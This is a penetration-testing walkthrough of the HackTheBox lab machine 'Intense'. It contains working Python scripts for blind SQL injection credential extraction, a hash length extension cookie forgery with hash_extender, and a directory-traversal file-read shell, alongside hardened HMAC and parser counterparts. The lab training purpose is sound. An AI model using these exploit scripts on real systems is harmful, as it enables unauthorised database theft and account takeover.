Intense box: obtaining User privileges
Word count: 1460  2025-08-15 21:33:16
Intense box penetration-testing walkthrough
Box overview
Intense is a medium-to-hard box on the HackTheBox (HTB) platform; it requires the following skills:
- Python source-code auditing
- SQL injection theory and practice
- SNMP remote command execution
- Stack overflows and ROP
0x01 Information gathering
Port scan
TCP port scan:

```bash
nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.195
```

Open ports found:
- 22/tcp (SSH)
- 80/tcp (HTTP)
Detailed service identification:

```bash
nmap -p 22,80 -sC -sV -oA scans/nmap-tcpscripts 10.10.10.195
```

Result:
- SSH: OpenSSH 7.6p1 Ubuntu
- HTTP: nginx 1.14.0 (Ubuntu)
UDP port scan:

```bash
nmap -sU -p- --min-rate 10000 -oA scans/nmap-alludp 10.10.10.195
```

Open ports found:
- 161/udp (SNMP)
SNMP enumeration
Probing with snmpwalk (the community string `public` is accepted):

```bash
snmpwalk -v 2c -c public 10.10.10.195
```

System information obtained:
- Linux intense 4.15.0-55-generic
- Ubuntu
Summary of findings
| Item | Details |
|---|---|
| Target IP | 10.10.10.195 |
| Open ports | 80/http, 22/ssh, 161/snmp |
| Operating system | Ubuntu Bionic 18.04 |
| Web server | Nginx/1.14.0 |
| SSH version | OpenSSH 7.6p1 |
Vulnerability analysis
Checking Vulmon for known vulnerabilities in the identified versions:
- Ubuntu Bionic 18.04: no directly exploitable vulnerability
- Nginx/1.14.0: no directly exploitable vulnerability
- OpenSSH 7.6p1: no directly exploitable vulnerability
0x02 Web application analysis
Basic information
- Login entry point: /login
- Default credentials: guest/guest
- Source code location: /src.zip
- Functional page: /submit
Directory brute force

```bash
gobuster dir -u http://10.10.10.195 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
```

Directories found:
- /home
- /login
- /submit
- /admin (403)
- /logout
Key findings
- The application source code is available (src.zip)
- The /submit page has a SQL injection vulnerability
- An admin entry point exists at /admin
0x03 Source code audit
Login logic analysis
Login route:

```python
@app.route("/postlogin", methods=["POST"])
def postlogin():
    data = try_login(request.form)
    if data:
        resp = make_response("OK")
        session = lwt.create_session(data)
        cookie = lwt.create_cookie(session)
        resp.set_cookie("auth", cookie)
        return resp
    return "Login failed"
```

The try_login function:

```python
def try_login(form):
    if not form:
        return None
    username = form["username"]
    password = hash_password(form["password"])
    result = query_db("select count(*) from users where username = ? and secret = ?",
                      (username, password), one=True)
    if result and result[0]:
        return {"username": username, "secret": password}
    return None
```

Session mechanism analysis
The create_session function serialises the login data as `key=value;` pairs:

```python
def create_session(data):
    session = ""
    for k, v in data.items():
        session += f"{k}={v};"
    return session.encode()
```

The create_cookie function:

```python
def create_cookie(session):
    cookie_sig = sign(session)
    return b64encode(session) + b'.' + b64encode(cookie_sig)
```

The signature function is a plain hash over the secret concatenated with the message, the construction that is open to hash length extension:

```python
def sign(msg):
    return sha256(SECRET + msg).digest()
```

SECRET is an 8-15 byte random value:

```python
SECRET = os.urandom(randrange(8, 15))  # randrange(8, 15) yields 8..14 bytes
```
0x04 Exploitation
SQL injection to obtain credentials
A Python script to brute-force usernames and password hashes character by character. The oracle is `load_extension('a')`: SQLite only evaluates it when the preceding condition is true, and it then fails with a "not authorized" error, which leaks one bit per request:

```python
#!/usr/bin/env python3
import requests
import string
import sys


def brute_user(res):
    # Extend the known username prefix `res` one character at a time
    for c in string.ascii_lowercase + string.digits:
        sys.stdout.write(f"\r[*] Trying username: {res}{c.ljust(20)}")
        sys.stdout.flush()
        resp = requests.post("http://10.10.10.195/submitmessage",
            data=f"message='||(select username from users where username LIKE'{res + c}%' and load_extension('a'))||'",
            headers={"Content-Type": "application/x-www-form-urlencoded"},
        )
        if "not authorized" in resp.text:
            # Prefix matches; check whether it is already a complete username
            resp = requests.post("http://10.10.10.195/submitmessage",
                data=f"message='||(select username from users where username ='{res + c}' and load_extension('a'))||'",
                headers={"Content-Type": "application/x-www-form-urlencoded"},
            )
            if "not authorized" in resp.text:
                print(f"\r[+] Found user: {res}{c.ljust(20)}")
                brute_pass(res + c)
            brute_user(res + c)


def brute_pass(user):
    # The secret column holds a 64-character hex SHA-256 hash
    password = ""
    for i in range(64):
        for c in string.hexdigits:
            sys.stdout.write(f"\r[+] Password: {password}{c}")
            sys.stdout.flush()
            resp = requests.post("http://10.10.10.195/submitmessage",
                data=f"message='||(select secret from users where username ='{user}' and substr(secret, {i+1},1) = '{c}' and load_extension('a'))||'",
                headers={"Content-Type": "application/x-www-form-urlencoded"},
            )
            if "not authorized" in resp.text:
                password += c
                break
    print(f"\r[+] Found secret: {password.ljust(20)}")


brute_user("")
print("\r" + "".ljust(80))
```

Hashes obtained:
- admin: f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105
- guest: 84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec
Cookie forgery attack
Because the signature is sha256(SECRET + msg), a valid guest cookie can be extended with additional `username=admin;secret=...;` pairs without knowing SECRET. Use the hash_extender tool to forge an admin cookie, trying every secret length from 8 to 15 bytes:

```bash
/opt/hash_extender/hash_extender \
  --secret-min 8 --secret-max 15 \
  --data "username=guest;secret=84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec;" \
  --signature <original signature> \
  -f sha256 \
  --table \
  --append ";username=admin;secret=f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105;"
```
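An added example, not code from the box or from either referenced writeup, covering both the session scheme read in 0x03 and the extension used in 0x04: it reproduces the two weaknesses the forgery relies on (an extendable `sha256(SECRET + msg)` signature and a last-key-wins session parser) beside a hardened counterpart for each. The lenient parser is an assumed reconstruction of how the server reads the cookie back, and the 10-byte secret behind the constructed padding is hypothetical.

```python
import hashlib
import hmac
import secrets

# Vulnerable scheme from the box: sha256(SECRET || msg). SHA-256 is Merkle-Damgard, so the
# digest is the hash's whole internal state and anyone can keep hashing appended bytes
# without knowing SECRET (length extension); note sign(b"k", b"m") == sign(b"", b"km").
def sign_vulnerable(secret: bytes, msg: bytes) -> bytes:
    return hashlib.sha256(secret + msg).digest()

# Hardened: HMAC-SHA256 with a full 32-byte key, verified with a constant-time compare.
def new_key() -> bytes:
    return secrets.token_bytes(32)
def sign_hardened(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, "sha256").digest()
def verify_hardened(key: bytes, msg: bytes, sig: bytes) -> bool:
    return hmac.compare_digest(sign_hardened(key, msg), sig)

# Assumed reconstruction (not the app's code) of how the server reads "k=v;" pairs back:
# last key wins and parts without "=" (such as the SHA-256 glue padding) are skipped,
# which is why appended ";username=admin;..." data changes the identity.
def parse_session_lenient(session: bytes) -> dict:
    data = {}
    for part in session.split(b";"):
        if b"=" in part:
            k, v = part.split(b"=", 1)
            data[k.decode("latin-1")] = v.decode("latin-1")
    return data

# Hardened parser: printable ASCII only, every part a k=v pair, no duplicate keys;
# returns None for anything else instead of silently picking a winner.
def parse_session_strict(session: bytes):
    if not session.isascii() or not session.decode().isprintable():
        return None
    data = {}
    for part in session.decode().rstrip(";").split(";"):
        if "=" not in part:
            return None
        k, v = part.split("=", 1)
        if k in data:
            return None
        data[k] = v
    return data

# Constructed inputs: the guest session from the writeup, then the shape of a length-extended
# cookie (original data, SHA-256 padding for a hypothetical 10-byte secret, appended pairs).
GUEST = b"username=guest;secret=84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec;"
PADDING = b"\x80" + b"\x00" * 22 + (8 * (10 + len(GUEST))).to_bytes(8, "big")
FORGED = GUEST + PADDING + b";username=admin;secret=f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105;"
```

The lenient parser reads FORGED as admin while the strict parser rejects it outright, and under HMAC the extended bytes no longer verify against the guest signature.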
0x05 Exploiting the admin functionality
File read vulnerability
The admin log endpoints take a path parameter without restricting it to the log directory. Directory traversal:

```python
requests.post("http://10.10.10.195/admin/log/dir",
    data={"logdir": "../"},
    cookies={"auth": admin_cookie},
)
```

File read:

```python
requests.post("http://10.10.10.195/admin/log/view",
    data={"logfile": "../app.ini"},
    cookies={"auth": admin_cookie},
)
```
Automated exploitation script

```python
#!/usr/bin/env python3
import base64
import binascii
import shlex
import requests
import subprocess
from cmd import Cmd


class Term(Cmd):
    prompt = "intense> "

    def __init__(self):
        Cmd.__init__(self)
        # Obtain the guest cookie
        resp = requests.post("http://10.10.10.195/postlogin",
            data={"username": "guest", "password": "guest"},
            headers={"Content-Type": "application/x-www-form-urlencoded; charset=UTF8"},
        )
        orig_cookie = resp.headers["Set-Cookie"].split("=", 1)[1]
        cookie_data_b64, cookie_sig_b64 = orig_cookie.split(".")
        cookie_data = base64.b64decode(cookie_data_b64).decode()
        cookie_sig_hex = binascii.hexlify(base64.b64decode(cookie_sig_b64)).decode()
        print("[+] Guest Cookie acquired")
        # Forge the cookie with hash_extender
        cmd = "/opt/hash_extender/hash_extender --secret-min 8 --secret-max 15 "
        cmd += "--data 'username=guest;secret=84983c60f7daadc1cb8698621f802c0d9f9a3c3c295c810748fb048115c186ec;' "
        cmd += f"--signature {cookie_sig_hex} -f sha256 --table "
        cmd += "--append ';username=admin;secret=f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105;'"
        # shlex.split removes the shell quoting; a plain split(" ") would pass the quote characters to hash_extender
        hash_extender = subprocess.check_output(shlex.split(cmd)).strip().decode().split("\n")
        print("[*] Generated hash extensions for 8 to 15 byte secrets")
        # --table prints one line per secret length; the last two fields are the new signature and the new data (hex)
        for test_hash in hash_extender:
            new_cookie_data = base64.b64encode(binascii.unhexlify(test_hash.split(" ")[-1])).decode()
            new_cookie_sig = base64.b64encode(binascii.unhexlify(test_hash.split(" ")[-2])).decode()
            new_cookie = f"{new_cookie_data}.{new_cookie_sig}"
            resp = requests.get("http://10.10.10.195/home", cookies=dict(auth=new_cookie))
            if "You can login with the username and password" not in resp.text:
                print("[+] Identified working cookie from generated options!")
                self.cookie = new_cookie
                break

    def do_ls(self, args):
        "Usage: ls [path relative to /]"
        resp = requests.post("http://10.10.10.195/admin/log/dir",
            data={"logdir": f"{args}"},
            cookies={"auth": self.cookie},
        )
        print(resp.text)

    def do_dir(self, args):
        "Usage: dir [path relative to /]"
        self.do_ls(args)

    def do_cat(self, args):
        "Usage: cat [file path relative to /]"
        resp = requests.post("http://10.10.10.195/admin/log/view",
            data={"logfile": f"{args}"},
            cookies={"auth": self.cookie},
        )
        print(resp.text)

    def precmd(self, args):
        # A command with no argument shows its usage text instead
        if len(args.split(" ")) < 2:
            c = args.split(" ", 1)[0]
            args = f"help {c}"
        return args


term = Term()
try:
    term.cmdloop()
except KeyboardInterrupt:
    print()
```
0x06 Obtaining User privileges
Use the file read vulnerability to retrieve user.txt:

```
intense> ls /home/user/user.txt
#707580d2...
```

Summary
The key path through this box:
- Obtain the administrator's credential hash via SQL injection
- Analyse the session mechanism and forge an administrator cookie with a hash length extension attack
- Use the file read vulnerability in the admin functionality to obtain sensitive information
References
- https://0xdf.gitlab.io/2020/11/14/htb-intense.html
- https://www.romanh.de/writeup/htb-intense
- MS08067 Lab website: www.ms08067.com